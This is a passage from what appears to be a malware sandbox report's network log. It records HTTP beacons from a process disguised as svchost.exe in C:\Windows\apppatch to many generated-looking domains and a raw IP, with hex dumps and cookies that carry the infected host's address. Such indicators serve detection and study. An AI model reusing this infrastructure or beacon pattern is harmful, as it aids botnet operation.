                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfKkKlHitQr0FpxYEtnkMEJnUp1Piv7X8oEoux17TDvI7OLunkoXQr2E1kg%2B5FF1LNlHgE%2Fcv71qX%2FM3Q%2FcOPVLe9XdvMX4QObCtYi9%2BGuqVLztxnQ38gnXqSE5cOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffbf67c2e8c24-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Nov 11, 2024 18:25:56.592617989 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:57.002827883 CET805INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:56 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38lT4Rdb1bZUWjyPU0N%2F261ILnWvVmjVqtcvCm7vfN3MmN4whuHWP%2F8aYSJF%2BNBT7OyCaNm5HSJkbCCy6dKUCdttMvU0SQhjWlBdaTEzcaR6PIROXWFE%2B9RsGo0uMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc04fd828c24-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=4&recv=6&lost=0&retrans=0&sent_bytes=972&recv_bytes=486&delivery_rate=2188964&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Nov 11, 2024 18:25:57.002897978 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          52192.168.2.85352675.2.71.199801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:53.957417965 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.385104895 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          53192.168.2.85352785.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.335731030 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          54192.168.2.85353023.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.403803110 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.888887882 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:49 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:25:54.888935089 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          55192.168.2.853544188.114.96.3801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.343590975 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:59.018065929 CET976INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9rhgPS7%2BusTnynnRt%2BIeyAWvK8u%2FP09J%2B73HISsEqSe1VCAqqHnDU5I0IqvjrBrUwVuT6%2F9jvaQmR7T3uy7vhVEU1Z7S6s7%2BCNe1BikQgq34zKN57UEMIltFGO%2BhVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc11fe8c42a5-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          56192.168.2.8535453.94.10.34801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.357043028 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygynud.com
                                                                                                                                                                                                          Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.779911995 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345958|1731345850|54|2|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          57192.168.2.85354613.248.169.48801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.433348894 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupydeq.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.891608000 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          58192.168.2.85354718.208.156.248801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.569879055 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupycag.com
                                                                                                                                                                                                          Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.996804953 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345958|1731345850|54|2|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          59192.168.2.853548103.150.10.48801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.930738926 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:25:59.709417105 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:59 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          60192.168.2.853550106.15.232.16380001736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:25:59.718523979 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:26:00.511174917 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:00 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          61192.168.2.853551103.150.10.48801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:00.520631075 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:26:01.317761898 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          62192.168.2.853552188.114.96.380
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:00.953346014 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:26:01.737243891 CET974INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NpOGnEarO1O4K%2BzZ7h%2BTWvbp2oNaJr1ggjnBqJQpVJ%2FQQhoz7ab%2BzhPw1%2Btccg3T4czKTnYV6O1nyDqEwF6FxuRRHnoUjbTC%2BBGTYkegvUVezIEtoXL1gIReMynWhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc224cba0fa0-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1174&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          63192.168.2.853553106.15.232.16380001736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:01.324882984 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
